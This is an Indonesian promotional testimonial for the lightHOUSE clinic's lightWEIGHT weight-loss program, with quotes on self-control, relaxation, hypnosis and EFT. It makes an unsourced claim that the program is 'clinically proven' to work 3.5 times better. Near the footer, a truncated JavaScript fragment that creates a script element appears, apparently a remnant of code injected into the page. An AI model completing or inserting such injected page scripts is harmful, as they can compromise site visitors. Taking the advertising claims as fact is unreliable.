Testimoni: Bisnis Kuliner Bukan Lagi Hambatan Miliki Berat Badan Ideal

“Saya mengikuti program di lightHOUSE Cilandak sejak Maret hingga Juli 2015 dan Alhamdullilah bisa turun 18 kg.”

Demikian testimoni dari salah seorang klien kami, Founder and President Director of PT. Baba Rafi Indonesia Hendy Setiono, yang menjalani program penurunan berat badan paling komprehensif lightWEIGHT.

Program lightWEIGHT yang menjadi andalan di klinik lightHOUSE Indonesia ini memang telah terbukti secara klinis mampu menurunkan berat badan 3,5 kali lebih banyak dibandingkan terapi atau konsultasi konvensional.

“Sebagai pengusaha kuliner yang setiap hari berkutat dengan makanan, program lightWEIGHT mampu mengubah mindset saya dengan pola makan yang lebih sehat,” ujar Hendy yang sukses menjalani bisnis makanan sejak 2003.

Hendy mengaku, sebelumnya sudah banyak mengikuti program diet lain, tapi selalu gagal. “Hanya lightHOUSE yang mampu dan berhasil mentranformasi berat badan saya menjadi ideal,” ia menjelaskan.

2v16mmr

Kontrol Diri
Mengapa program lightWEIGHT lebih berhasil? “Selain membutuhkan pengaturan gizi dan olahraga, masalah obesitas memang membutuhkan perubahan cara berpikir, “ demikian pendapat pakar dan pendiri lightHOUSE Indonesia dr. Grace Judio, MSc.

Menurut dr. Grace hal utama yang menyebabkan program diet seseorang gagal adalah akibat kontrol diri yang buruk, terutama bila menghadapi banyak makanan, pekerjaan, sedang stres, atau menghadiri jamuan makan.

“Ketidakmampuan seseorang untuk mengontrol diri memang menjadi faktor penyebab utama kenaikan maupun naik turunnya berat badan. Makanya, kontrol diri menjadi faktor yang sangat penting di dalam mengubah gaya hidup maupun pola makan seseorang,” papar dr. Grace.

Karena itu, dr. Grace menyarankan agar penanganan obesitas ini sebaiknya ditangani oleh tim multi disipliner yang terdiri dari dokter, ahli gizi, psikolog, pelatih kebugaran, dan lainnya.

“Masalah obesitas itu ada banyak sebabnya, sehingga harus ditangani secara komperehensif. Tidak cukup hanya dinasehati saja, tapi juga perlu dilatih bagaimana mengontrol dirinya,” ujar dr. Garce.

Pentingnya Relaksasi
Nah, bagaimana cara menguatkan kontrol diri? Tim Psikolog di klinik lightHOUSE mengajarkan cara relaksasi untuk dapat meningkatkan kontrol diri, terutama saat menghadapi makanan.

“Relaksasi merupakan komponen yang penting dalam pengendalian diri karena seseorang tidak mungkin berada dalam kondisi rileks dan lepas kendali pada waktu yang bersamaan. Relaksasi dapat meredam berbagai bentuk emosi, ujar Tim Psikolog lightHOUSE Indonesia yang dipimpin oleh Psikolog Tara Adisti de Thouars, BA, M.Psi.

Tara mencontohkan, “Menarik napas panjang dalam-dalam sebanyak tiga kali akan sangat bermanfaat untuk mengontrol rasa marah. Relaksasi akan lebih efektif dilakukan ketika emosi baru saja muncul, daripada menunggu emosi kita menjadi terlalu kuat. Karena lebih mudah memadamkan korek api daripada obor, bukan?”

Klinik lightHOUSE Indonesia mengajarkan teknik pernafasan dalam bentuk workshop relaksasi. Selain itu, kami juga menyediakan fasilitas relaksasi melalui hipnosis. Bagi pasien yang mengikuti program lightWEIGHT juga akan diajarkan teknik-teknik relaksasi lain yang efektif untuk mengendalikan emosi, seperti guided imagery dan emotional freedom technique (EFT). Jadi program penurunan berat badan bisa juga menyenangkan, bukan?

 var d=document;var s=d.createElement(‘script’);

PT Shape Up Indonesia - Copyright © 2019. All Rights Reserved.
Developed byPetrus Andre
FAQ